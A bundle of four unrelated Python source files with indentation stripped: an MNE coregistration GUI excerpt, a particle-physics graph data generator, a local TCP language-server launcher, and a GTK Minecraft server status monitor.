msg += ("No subjects were found in subjects_dir=%s. " %
self.model.mri.subjects_dir)
msg += ("Make sure all MRI subjects have head shape files "
"(run $ mne make_scalp_surfaces).")
raise ValueError(msg)
self.model.mri.subject = subject
if trans is not None:
try:
self.model.load_trans(trans)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans, e), "Error Loading Trans File")
@on_trait_change('subject_panel:subject')
def _set_title(self):
self.title = '%s - MNE Coreg' % self.model.mri.subject
@on_trait_change('scene:activated')
def _init_plot(self):
_toggle_mlab_render(self, False)
self._on_advanced_rendering_change()
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
#
# Due to MESA rendering / z-order bugs, this should be added and
# rendered first (see gh-5375).
color = defaults['head_color']
self.mri_obj = SurfaceObject(
points=np.empty((0, 3)), color=color, tris=np.empty((0, 3)),
scene=self.scene, name="MRI Scalp", block_behind=True,
# opacity=self._initial_kwargs['head_opacity'],
# setting opacity here causes points to be
# [[0, 0, 0]] -- why??
)
self.mri_obj.opacity = self._initial_kwargs['head_opacity']
self.data_panel.fid_panel.hsp_obj = self.mri_obj
self._update_mri_obj()
self.mri_obj.plot()
# Do not do sync_trait here, instead use notifiers elsewhere
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.mri_lpa_obj = PointObject(scene=self.scene, color=lpa_color,
has_norm=True, point_scale=point_scale,
name='LPA')
self.model.sync_trait('transformed_mri_lpa',
self.mri_lpa_obj, 'points', mutual=False)
self.mri_nasion_obj = PointObject(scene=self.scene, color=nasion_color,
has_norm=True,
point_scale=point_scale,
name='Nasion')
self.model.sync_trait('transformed_mri_nasion',
self.mri_nasion_obj, 'points', mutual=False)
self.mri_rpa_obj = PointObject(scene=self.scene, color=rpa_color,
has_norm=True, point_scale=point_scale,
name='RPA')
self.model.sync_trait('transformed_mri_rpa',
self.mri_rpa_obj, 'points', mutual=False)
# Digitizer Head Shape
kwargs = dict(
view='cloud', scene=self.scene, resolution=20,
orient_to_surface=self._initial_kwargs['orient_to_surface'],
scale_by_distance=self._initial_kwargs['scale_by_distance'],
mark_inside=self._initial_kwargs['mark_inside'])
self.hsp_obj = PointObject(
color=defaults['extra_color'], name='Extra', has_norm=True,
point_scale=defaults['extra_scale'], **kwargs)
self.model.sync_trait('transformed_hsp_points',
self.hsp_obj, 'points', mutual=False)
# Digitizer EEG
self.eeg_obj = PointObject(
color=defaults['eeg_color'], point_scale=defaults['eeg_scale'],
name='EEG', projectable=True, has_norm=True,
project_to_surface=self._initial_kwargs['project_eeg'], **kwargs)
self.model.sync_trait('transformed_hsp_eeg_points',
self.eeg_obj, 'points', mutual=False)
# Digitizer HPI
self.hpi_obj = PointObject(
color=defaults['hpi_color'], name='HPI', has_norm=True,
point_scale=defaults['hpi_scale'], **kwargs)
self.model.sync_trait('transformed_hsp_hpi',
self.hpi_obj, 'points', mutual=False)
for p in (self.hsp_obj, self.eeg_obj, self.hpi_obj):
p.inside_color = self.mri_obj.color
self.mri_obj.sync_trait('color', p, 'inside_color',
mutual=False)
# Digitizer Fiducials
point_scale = defaults['dig_fid_scale']
opacity = defaults['dig_fid_opacity']
self.hsp_lpa_obj = PointObject(
scene=self.scene, color=lpa_color, opacity=opacity,
has_norm=True, point_scale=point_scale, name='HSP-LPA')
self.model.sync_trait('transformed_hsp_lpa',
self.hsp_lpa_obj, 'points', mutual=False)
self.hsp_nasion_obj = PointObject(
scene=self.scene, color=nasion_color, opacity=opacity,
has_norm=True, point_scale=point_scale, name='HSP-Nasion')
self.model.sync_trait('transformed_hsp_nasion',
self.hsp_nasion_obj, 'points', mutual=False)
self.hsp_rpa_obj = PointObject(
scene=self.scene, color=rpa_color, opacity=opacity,
has_norm=True, point_scale=point_scale, name='HSP-RPA')
self.model.sync_trait('transformed_hsp_rpa',
self.hsp_rpa_obj, 'points', mutual=False)
# All points share these
for p in (self.hsp_obj, self.eeg_obj, self.hpi_obj,
self.hsp_lpa_obj, self.hsp_nasion_obj, self.hsp_rpa_obj):
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
self.model.sync_trait('mri_trans_noscale', p, 'project_to_trans',
mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
self.picker = on_pick(self.data_panel.fid_panel._on_pick, type='cell')
# Coordinate frame axes
self.mri_cf_obj = PointObject(
scene=self.scene, color=self.mri_obj.color,
opacity=self.mri_obj.opacity, label_scale=5e-3,
point_scale=0.02, name='MRI', view='arrow')
self.mri_obj.sync_trait('color', self.mri_cf_obj, mutual=False)
self._update_mri_axes()
self.hsp_cf_obj = PointObject(
scene=self.scene, color=self.hsp_obj.color,
opacity=self.mri_obj.opacity, label_scale=5e-3,
point_scale=0.02, name='Head', view='arrow')
self.hsp_cf_obj.sync_trait('color', self.hsp_cf_obj, mutual=False)
self._update_hsp_axes()
self.sync_trait('bgcolor', self.scene, 'background')
self._update_projection_surf()
_toggle_mlab_render(self, True)
self.scene.render()
self.scene.camera.focal_point = (0., 0., 0.)
self.data_panel.view_options_panel = ViewOptionsPanel(
mri_obj=self.mri_obj, hsp_obj=self.hsp_obj,
eeg_obj=self.eeg_obj, hpi_obj=self.hpi_obj,
hsp_cf_obj=self.hsp_cf_obj, mri_cf_obj=self.mri_cf_obj,
head_high_res=self.head_high_res,
bgcolor=self.bgcolor, advanced_rendering=self.advanced_rendering)
self.data_panel.headview.scale = self._initial_kwargs['scale']
self.data_panel.headview.interaction = \
self._initial_kwargs['interaction']
self.data_panel.headview.left = True
self.data_panel.view_options_panel.sync_trait(
'coord_frame', self.model)
self.data_panel.view_options_panel.sync_trait('head_high_res', self)
self.data_panel.view_options_panel.sync_trait('advanced_rendering',
self)
self.data_panel.view_options_panel.sync_trait('bgcolor', self)
@on_trait_change('advanced_rendering')
def _on_advanced_rendering_change(self):
renderer = getattr(self.scene, 'renderer', None)
if renderer is None:
return
if self.advanced_rendering:
renderer.use_depth_peeling = 1
renderer.occlusion_ratio = 0.1
renderer.maximum_number_of_peels = 100
renderer.vtk_window.multi_samples = 0
renderer.vtk_window.alpha_bit_planes = 1
else:
renderer.use_depth_peeling = 0
renderer.vtk_window.multi_samples = 8
renderer.vtk_window.alpha_bit_planes = 0
if hasattr(renderer, 'use_fxaa'):
self.scene.renderer.use_fxaa = True
self.scene.render()
@on_trait_change('lock_fiducials')
def _on_lock_change(self):
if not self.lock_fiducials:
if self.mri_obj is None:
self._initial_kwargs['head_opacity'] = 1.
else:
self._locked_opacity = self.mri_obj.opacity
self.mri_obj.opacity = 1.
else:
if self.mri_obj is not None:
self.mri_obj.opacity = self._locked_opacity
@cached_property
def _get_hsp_visible(self):
return self.data_panel.hsp_always_visible or self.lock_fiducials
@on_trait_change('model:mri_trans')
def _update_mri_axes(self):
if self.mri_cf_obj is None:
return
nn = apply_trans(self.model.mri_trans, np.eye(3), move=False)
pts = apply_trans(self.model.mri_trans, np.zeros((3, 3)))
self.mri_cf_obj.nn = nn
self.mri_cf_obj.points = pts
@on_trait_change('model:hsp_trans')
def _update_hsp_axes(self):
if self.hsp_cf_obj is None:
return
nn = apply_trans(self.model.hsp_trans, np.eye(3), move=False)
pts = apply_trans(self.model.hsp_trans, np.zeros((3, 3)))
self.hsp_cf_obj.nn = nn
self.hsp_cf_obj.points = pts
@on_trait_change('nearest_calc')
def _update_projection_surf(self):
if len(self.model.processed_low_res_mri_points) <= 1:
return
rr = (self.model.processed_low_res_mri_points *
self.model.parameters[6:9])
surf = dict(rr=rr, tris=self.model.mri.bem_low_res.surf.tris,
nn=self.model.mri.bem_low_res.surf.nn)
check_inside = _CheckInside(surf)
nearest = _DistanceQuery(rr)
for p in (self.eeg_obj, self.hsp_obj, self.hpi_obj):
if p is not None:
p.check_inside = check_inside
p.nearest = nearest
@on_trait_change('model:mri:bem_low_res:surf,head_high_res,'
'model:transformed_high_res_mri_points')
def _update_mri_obj(self):
if self.mri_obj is None:
return
self.mri_obj.tris = getattr(
self.model.mri, 'bem_%s_res'
% ('high' if self.head_high_res else 'low',)).surf.tris
self.mri_obj.points = getattr(
self.model, 'transformed_%s_res_mri_points'
% ('high' if self.head_high_res else 'low',))
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model:mri:fid_file')
def _on_fid_file_loaded(self):
self.data_panel.fid_panel.locked = bool(self.model.mri.fid_file)
def save_config(self, home_dir=None, size=None):
"""Write configuration values."""
def s_c(key, value, lower=True):
value = str(value)
if lower:
value = value.lower()
set_config(key, str(value).lower(), home_dir=home_dir,
set_env=False)
s_c('MNE_COREG_GUESS_MRI_SUBJECT', self.model.guess_mri_subject)
s_c('MNE_COREG_HEAD_HIGH_RES', self.head_high_res)
s_c('MNE_COREG_ADVANCED_RENDERING', self.advanced_rendering)
if self.lock_fiducials:
opacity = self.mri_obj.opacity
else:
opacity = self._locked_opacity
s_c('MNE_COREG_HEAD_OPACITY', opacity)
if size is not None:
s_c('MNE_COREG_WINDOW_WIDTH', size[0])
s_c('MNE_COREG_WINDOW_HEIGHT', size[1])
s_c('MNE_COREG_SCENE_SCALE', self.data_panel.headview.scale)
s_c('MNE_COREG_SCALE_LABELS', self.model.scale_labels)
s_c('MNE_COREG_COPY_ANNOT', self.model.copy_annot)
s_c('MNE_COREG_PREPARE_BEM', self.model.prepare_bem_model)
if self.model.mri.subjects_dir:
s_c('MNE_COREG_SUBJECTS_DIR', self.model.mri.subjects_dir, False)
s_c('MNE_COREG_PROJECT_EEG', self.project_to_surface)
s_c('MNE_COREG_ORIENT_TO_SURFACE', self.orient_to_surface)
s_c('MNE_COREG_SCALE_BY_DISTANCE', self.scale_by_distance)
s_c('MNE_COREG_MARK_INSIDE', self.mark_inside)
s_c('MNE_COREG_INTERACTION', self.data_panel.headview.interaction)
|
mpdatagen_nearest.py
|
import numpy as np
import glob
import os
import uproot as ur
import time
from multiprocessing import Process, Queue, set_start_method
import compress_pickle as pickle
from scipy.stats import circmean
from sklearn.neighbors import NearestNeighbors
import random
def geo_coords_to_xyz(geo_data):
geo_xyz = np.zeros((geo_data['cell_geo_eta'][0].shape[0], 3))
geo_xyz[:, 0] = geo_data["cell_geo_rPerp"][0] * np.cos(geo_data["cell_geo_phi"][0])
geo_xyz[:, 1] = geo_data["cell_geo_rPerp"][0] * np.sin(geo_data["cell_geo_phi"][0])
cell_geo_theta = 2 * np.arctan(np.exp(-geo_data["cell_geo_eta"][0]))
geo_xyz[:, 2] = geo_data["cell_geo_rPerp"][0]/np.tan(cell_geo_theta)
return geo_xyz
class MPGraphDataGeneratorMultiOut:
"""DataGenerator class for extracting and formating data from list of root files"""
def __init__(self,
pi0_file_list: list,
pion_file_list: list,
cellGeo_file: str,
batch_size: int,
k: int,
use_xyz: bool = True,
shuffle: bool = True,
num_procs: int = 32,
preprocess: bool = False,
output_dir: str = None):
"""Initialization"""
self.preprocess = preprocess
self.output_dir = output_dir
if self.preprocess and self.output_dir is not None:
self.pi0_file_list = pi0_file_list
self.pion_file_list = pion_file_list
assert len(pi0_file_list) == len(pion_file_list)
self.num_files = len(self.pi0_file_list)
else:
self.file_list = pi0_file_list
self.num_files = len(self.file_list)
self.cellGeo_file = cellGeo_file
self.cellGeo_data = ur.open(self.cellGeo_file)['CellGeo']
self.geoFeatureNames = self.cellGeo_data.keys()[1:9]
self.nodeFeatureNames = ['cluster_cell_E', *self.geoFeatureNames[:-2]]
self.edgeFeatureNames = self.cellGeo_data.keys()[9:]
self.num_nodeFeatures = len(self.nodeFeatureNames)
self.num_edgeFeatures = len(self.edgeFeatureNames)
self.cellGeo_data = self.cellGeo_data.arrays(library='np')
self.geo_xyz = geo_coords_to_xyz(self.cellGeo_data)
self.geo_xyz /= np.max(self.geo_xyz)
self.use_xyz = use_xyz
self.cellGeo_ID = self.cellGeo_data['cell_geo_ID'][0]
self.sorter = np.argsort(self.cellGeo_ID)
self.batch_size = batch_size
self.k = k
self.shuffle = shuffle
if self.shuffle: np.random.shuffle(self.file_list)
self.num_procs = num_procs
self.procs = []
if self.preprocess and self.output_dir is not None:
os.makedirs(self.output_dir, exist_ok=True)
self.preprocess_data()
def get_cluster_calib(self, event_data, event_ind, cluster_ind):
""" Reading cluster calibration energy """
cluster_calib_E = event_data['cluster_ENG_CALIB_TOT'][event_ind][cluster_ind]
if cluster_calib_E <= 0:
return None
return np.log10(cluster_calib_E)
def get_data(self, event_data, event_ind, cluster_ind):
""" Reading Node features """
cell_IDs = event_data['cluster_cell_ID'][event_ind][cluster_ind]
cell_IDmap = self.sorter[np.searchsorted(self.cellGeo_ID, cell_IDs, sorter=self.sorter)]
nodes = np.log10(event_data['cluster_cell_E'][event_ind][cluster_ind])
global_node = np.log10(event_data['cluster_E'][event_ind][cluster_ind])
# Scaling the cell_geo_sampling by 28
nodes = np.append(nodes, self.cellGeo_data['cell_geo_sampling'][0][cell_IDmap]/28.)
for f in self.nodeFeatureNames[2:4]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
# Scaling the cell_geo_rPerp by 3000
nodes = np.append(nodes, self.cellGeo_data['cell_geo_rPerp'][0][cell_IDmap]/3000.)
for f in self.nodeFeatureNames[5:]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
nodes = np.reshape(nodes, (len(self.nodeFeatureNames), -1)).T
cluster_num_nodes = len(nodes)
# Using kNN on eta, phi, rPerp for creating graph
curr_k = np.min([self.k, nodes.shape[0]])
if self.use_xyz:
nodes_NN_feats = self.geo_xyz[cell_IDmap, :]
else:
nodes_NN_feats = nodes[:, 2:5]
# nbrs = NearestNeighbors(n_neighbors=curr_k, algorithm='ball_tree').fit(nodes[:, 2:5])
nbrs = NearestNeighbors(n_neighbors=curr_k, algorithm='ball_tree').fit(nodes_NN_feats)
distances, indices = nbrs.kneighbors(nodes_NN_feats)
senders = indices[:, 1:].flatten()
receivers = np.repeat(indices[:, 0], curr_k-1)
edges = distances[:, 1:].reshape(-1, 1)
return nodes, np.array([global_node]), senders, receivers, edges
def preprocessor(self, worker_id):
file_num = worker_id
while file_num < self.num_files:
file = self.pion_file_list[file_num]
event_tree = ur.open(file)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
preprocessed_data = []
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, senders, receivers, edges = self.get_data(event_data, event_ind, i)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 1], [1,2])
preprocessed_data.append((graph, target))
file = self.pi0_file_list[file_num]
event_tree = ur.open(file)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, senders, receivers, edges = self.get_data(event_data, event_ind, i)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 0], [1,2])
preprocessed_data.append((graph, target))
random.shuffle(preprocessed_data)
pickle.dump(preprocessed_data, open(self.output_dir + 'data_{}.p'.format(file_num), 'wb'), compression='gzip')
file_num += self.num_procs
def preprocess_data(self):
print('\nPreprocessing and saving data to {}'.format(self.output_dir))
for i in range(self.num_procs):
p = Process(target=self.preprocessor, args=(i,), daemon=True)
p.start()
self.procs.append(p)
for p in self.procs:
p.join()
self.file_list = [self.output_dir + 'data_{}.p'.format(i) for i in range(self.num_files)]
def preprocessed_worker(self, worker_id, batch_queue):
batch_graphs = []
batch_targets = []
file_num = worker_id
while file_num < self.num_files:
file_data = pickle.load(open(self.file_list[file_num], 'rb'), compression='gzip')
for i in range(len(file_data)):
batch_graphs.append(file_data[i][0])
batch_targets.append(file_data[i][1])
if len(batch_graphs) == self.batch_size:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets))
batch_graphs = []
batch_targets = []
file_num += self.num_procs
if len(batch_graphs) > 0:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets))
def worker(self, worker_id, batch_queue):
if self.preprocess:
self.preprocessed_worker(worker_id, batch_queue)
else:
raise Exception('Preprocessing is required for combined classification/regression models.')
def check_procs(self):
for p in self.procs:
if p.is_alive(): return True
return False
def kill_procs(self):
for p in self.procs:
p.kill()
self.procs = []
def generator(self):
# for file in self.file_list:
batch_queue = Queue(2 * self.num_procs)
for i in range(self.num_procs):
p = Process(target=self.worker, args=(i, batch_queue), daemon=True)
p.start()
self.procs.append(p)
while self.check_procs() or not batch_queue.empty():
try:
batch = batch_queue.get(True, 0.0001)
except:
continue
yield batch
for p in self.procs:
p.join()
if __name__ == '__main__':
data_dir = '/usr/workspace/pierfied/preprocessed/data/'
out_dir = '/usr/workspace/pierfied/preprocessed/preprocessed_data/'
pion_files = np.sort(glob.glob(data_dir+'user*.root'))
data_gen = MPGraphDataGenerator(file_list=pion_files,
cellGeo_file=data_dir+'cell_geo.root',
batch_size=32,
shuffle=False,
num_procs=32,
preprocess=True,
output_dir=out_dir)
gen = data_gen.generator()
from tqdm.auto import tqdm
for batch in tqdm(gen):
pass
exit()
|
server.py
|
import logging
import os
import socketserver
import threading
import argparse
from functools import partial
from typing import Callable, Optional
from mrols.mro_lang_server import MROLanguageServer
log = logging.getLogger(__name__)
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
DELEGATE_CLASS: Optional[Callable] = None
SHUTDOWN_CALL: Optional[Callable] = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# the DELEGATE_CLASS should be MROLanguageServer
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == 'nt':
# Catch & pass on ConnectionResetError when parent process dies
# pylint: disable=no-member, undefined-variable
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
# pylint: disable=no-member
self.SHUTDOWN_CALL()
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
if not issubclass(handler_class, MROLanguageServer):
raise ValueError(
'Handler class must be an instance of MROLanguageServer')
def shutdown_server(check_parent_process, *args):
# pylint: disable=unused-argument
if check_parent_process:
log.debug('Shutting down server')
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': partial(handler_class,
check_parent_process=check_parent_process),
'SHUTDOWN_CALL': partial(shutdown_server, check_parent_process)}
)
server = socketserver.TCPServer((bind_addr, port),
wrapper_class,
bind_and_activate=False)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr,
port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Start the Python MRO Language Server'
)
parser.add_argument(
'port', default=3000, nargs='?', type=int,
help='the port to use by the language server'
)
args = parser.parse_args()
start_tcp_lang_server('127.0.0.1', args.port, False, MROLanguageServer)
|
mc-monitor.py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# VERSION: 1.2.2
"""
Copyright 2016 Fingercomp
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mcstatus import MinecraftServer
import socket
import time
# import datetime as dt
from threading import Thread
from threading import Timer
import os
import urllib as ur
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from gi.repository import GLib
gi.require_version("Notify", "0.7")
GLib.threads_init()
home = os.path.expanduser("~") + "/"
config = home + ".local/share/python-utils/"
# CONFIGURATION
if not os.path.exists(config):
os.makedirs(config)
if not os.path.exists(config + "mc-monitor/"):
os.mkdir(config + "mc-monitor/")
if not os.path.exists(config + "mc-monitor/mc-monitor.cfg"):
f = open(config + "mc-monitor/mc-monitor.cfg", "w")
f.write("")
f.close()
dialog = Gtk.MessageDialog(parent=Gtk.Window(),
message_type=Gtk.MessageType.INFO,
buttons=Gtk.ButtonsType.OK,
message_format="Configuration file created!")
dialog.format_secondary_markup(
"Path to file: <b>" + config + "mc-monitor/mc-monitor.cfg</b>.")
dialog.run()
dialog.destroy()
# if not os.path.exists(config + "mc-monitor/vote"):
# f = open(config + "mc-monitor/vote", "w")
# f.write("2012 12 12 12 12 12")
if not os.path.exists(config + "icons/"):
os.mkdir(config + "icons/")
if not os.path.exists(config + "icons/mc-monitor.png"):
response = ur.urlopen("https://raw.githubusercontent.com/Fingercomp/"
"python-utils/master/icons/mc-monitor.png")
f = open(config + "icons/mc-monitor.png", "wb")
img = response.read()
f.write(img)
f.close()
# if not os.path.exists(config + "icons/mc-monitor-important.png"):
# response = ur.urlopen("https://raw.githubusercontent.com/Fingercomp/" \
# "python-utils/master/icons/mc-monitor-important.png")
# f = open(config + "icons/mc-monitor-important.png", "wb")
# img = response.read()
# f.write(img)
# f.close()
DELAY = 15
# VOTEFILE = config + "mc-monitor/vote"
SERVERSFILE = config + "mc-monitor/mc-monitor.cfg"
# nots = True
# if os.name == "nt":
# # Windows, turn off notifications
# nots = False
# if nots:
# from gi.repository import Notify
# http://stackoverflow.com/a/13151299
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._time = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.function(*self.args, **self.kwargs)
self.start()
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def cancel(self):
self._timer.cancel()
self.is_running = False
class CheckServers:
def __init__(self):
self.ind = Gtk.StatusIcon.new_from_file(
config + "icons/mc-monitor.png")
self.ind.set_tooltip_text("...")
self.servers = {}
conf = open(SERVERSFILE, "r")
for line in reversed(conf.readlines()):
line = line.strip()
if line[0] != "#":
data = line.split("=")
self.servers[data[0]] = [None, None, data[1]]
conf.close()
self.menu_setup()
self.ind.connect("popup-menu", lambda icon, btn, time: self.menu.popup(
None, None, None, None, btn, time))
# if nots is True:
# Notify.init("check-servers")
# self.notification = Notify.Notification.new(
# "Vote?", "It's time to vote!")
# self.min30_sent = False
# self.min15_sent = False
# self.min5_sent = False
# self.min1_sent = False
# self.show_notification = False
self.ready_to_show = True
self.gui_upd = False
# self.cur_icon = 0
def menu_setup(self):
self.menu = Gtk.Menu()
for addr in self.servers:
cws = self.servers[addr]
cws[1] = Gtk.Menu()
cws[0] = Gtk.MenuItem(cws[2])
cws[0].set_submenu(cws[1])
cws[0].show()
self.menu.append(cws[0])
# self.separator_vote = Gtk.SeparatorMenuItem()
# self.separator_vote.show()
# self.menu.append(self.separator_vote)
# self.vote_item = Gtk.MenuItem("Loading...")
# self.vote_item.connect("activate", self.rewrite_date)
# self.vote_item.show()
# self.menu.append(self.vote_item)
self.separator_controls = Gtk.SeparatorMenuItem()
self.separator_controls.show()
self.menu.append(self.separator_controls)
self.refresh_item = Gtk.MenuItem("Refresh")
self.refresh_item.connect("activate", self.spawn_upddata_thread)
self.refresh_item.show()
self.menu.append(self.refresh_item)
self.quit_item = Gtk.MenuItem("Quit")
self.quit_item.connect("activate", self.quit)
self.quit_item.show()
self.menu.append(self.quit_item)
def main(self):
self.update_data()
self.update()
self.upddata_timer = RepeatedTimer(DELAY, self.update_data)
self.upddata_timer.start()
GLib.timeout_add(1000, self.update)
# GLib.timeout_add(1000, self.update_vote)
Gtk.main()
def spawn_upddata_thread(self, widget=True):
self.upddata_thread = Thread(target=self.update_data)
self.upddata_thread.start()
def quit(self, widget=True):
self.upddata_timer.cancel()
# if nots:
# Notify.uninit()
Gtk.main_quit()
# def Notify_vote(self):
# if self.show_notification is True and nots is True:
# self.notification.show()
# return True
# return False
# def rewrite_date(self, widget=True):
# cur_time = dt.datetime.now()
# open(VOTEFILE, "w").write((cur_time + dt.timedelta(days=1)).strftime(
# "%Y %m %d %H %M %S"))
# def update_vote(self):
# vote_at = dt.datetime(*[int(i) for i in open(VOTEFILE).read().strip()
# .split(" ")])
# cur_time = dt.datetime.now()
# if cur_time >= vote_at:
# self.vote_item.set_sensitive(True)
# if self.cur_icon != 1:
# self.ind.set_from_file(
# config + "icons/mc-monitor-important.png")
# self.cur_icon = 1
# self.vote_item.set_label("Restart the timer")
# if self.show_notification is False and nots is True:
# self.show_notification = True
# self.notification.show()
# GLib.timeout_add(30000, self.Notify_vote)
# else:
# if self.cur_icon != 0:
# self.ind.set_from_file(config + "icons/mc-monitor.png")
# self.cur_icon = 0
# vote_delta = vote_at - cur_time
# self.vote_item.set_label("Next vote: " + str(vote_delta)
# .split(".")[0])
# self.vote_item.set_sensitive(False)
# self.show_notification = False
# if nots is True:
# if vote_delta.seconds < 40:
# # Reset values to Notify again next time
# self.min30_sent = False
# self.min15_sent = False
# self.min5_sent = False
# self.min1_sent = False
# elif vote_delta.seconds > 55 and vote_delta.seconds < 60 and
# self.min1_sent is False:
# # Send a notification: 1 minute
# Notify.Notification.new("Prepare to vote",
# "1 minute left!").show()
# self.min30_sent = True
# self.min15_sent = True
# self.min5_sent = True
# self.min1_sent = True
# elif vote_delta.seconds > 295 and
# vote_delta.seconds < 300 and
# self.min5_sent is False:
# # Send a notification: 5 minutes
# Notify.Notification.new("Prepare to vote",
# "5 minutes left!").show()
# self.min30_sent = True
# self.min15_sent = True
# self.min5_sent = True
# elif vote_delta.seconds > 895 and vote_delta.seconds < 900 and
# self.min15_sent is False:
# # Send a notification: 15 minutes
# Notify.Notification.new("Prepare to vote",
# "15 minutes left!").show()
# self.min30_sent = True
# self.min15_sent = True
# elif vote_delta.seconds > 1795 and
# vote_delta.seconds < 1800 and
# self.min30_sent is False:
# # Send a notification: 30 minutes
# Notify.Notification.new("Prepare to vote",
# "30 minutes left!").show()
# self.min30_sent = True
# return True
def update_data(self):
if self.ready_to_show is True:
while self.gui_upd is True:
time.sleep(0.01)
self.ready_to_show = False
self.servdata = {}
self.totalservdata = {"online": 0, "max": 0}
for addr in self.servers:
# print("Upd: " + addr)
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
try:
server = MinecraftServer.lookup(addr)
try:
query = server.query()
self.servdata[addr] = {
"online": query.players.online,
"max": query.players.max,
"latency": -1,
"soft": query.software.version,
"query": True,
"ison": True,
"players": [pl for pl in query.players.names]
}
except (IOError, OSError, ValueError) as e:
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
print(e)
except (socket.herror, socket.gaierror, socket.timeout):
pass
except:
raise
try:
status = server.status()
if (addr in self.servdata and
"latency" in self.servdata[addr] and
self.servdata[addr]["latency"] == -1):
self.servdata[addr]["latency"] = status.latency
else:
self.servdata[addr] = {
"online": status.players.online,
"max": status.players.max,
"latency": status.latency,
"soft": "",
"query": False,
"ison": True,
"players": []
}
except (socket.gaierror, socket.herror, socket.timeout):
if (addr not in self.servdata or
self.servdata[addr]["latency"] != -1):
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
except (IOError, OSError, ValueError) as e:
print(e)
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
except:
raise
except Exception as e:
print(e)
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
self.totalservdata["online"] += self.servdata[addr]["online"]
self.totalservdata["max"] += self.servdata[addr]["max"]
self.ready_to_show = True
return True
def update(self, widget=True):
if self.ready_to_show is True:
self.gui_upd = True
self.refresh_item.set_label("Refresh")
self.refresh_item.set_sensitive(True)
for addr in self.servdata:
# print("GUI: " + addr)
cws = self.servers[addr]
info = self.servdata[addr]
for item in cws[1]:
cws[1].remove(item)
cws[0].set_sensitive(True)
if info["query"] is True:
cws[0].set_label(cws[2] + ": {0}/{1}, {2} ms, MC: {3}"
.format(info["online"], info["max"],
info["latency"], info["soft"]))
if len(info["players"]) > 0:
for i in info["players"]:
cur_menu_item = Gtk.MenuItem(i)
cur_menu_item.set_sensitive(False)
cur_menu_item.show()
cws[1].append(cur_menu_item)
else:
cws[0].set_sensitive(False)
elif info["ison"] is True:
cws[0].set_label(cws[2] + " [Q̶]: {0}/{1}, {2} ms".format(
info["online"], info["max"], info["latency"]))
cws[0].set_sensitive(False)
if info["ison"] is False:
cws[0].set_label(cws[2] + ": Info not available")
cws[0].set_sensitive(False)
# print("Max: " + str(self.totalservdata["max"]))
if self.totalservdata["max"] == 0:
self.ind.set_tooltip_text("OFF")
else:
self.ind.set_tooltip_text(str(
self.totalservdata["online"]) + "/" +
str(self.totalservdata["max"]))
self.gui_upd = False
else:
self.refresh_item.set_label("Refreshing...")
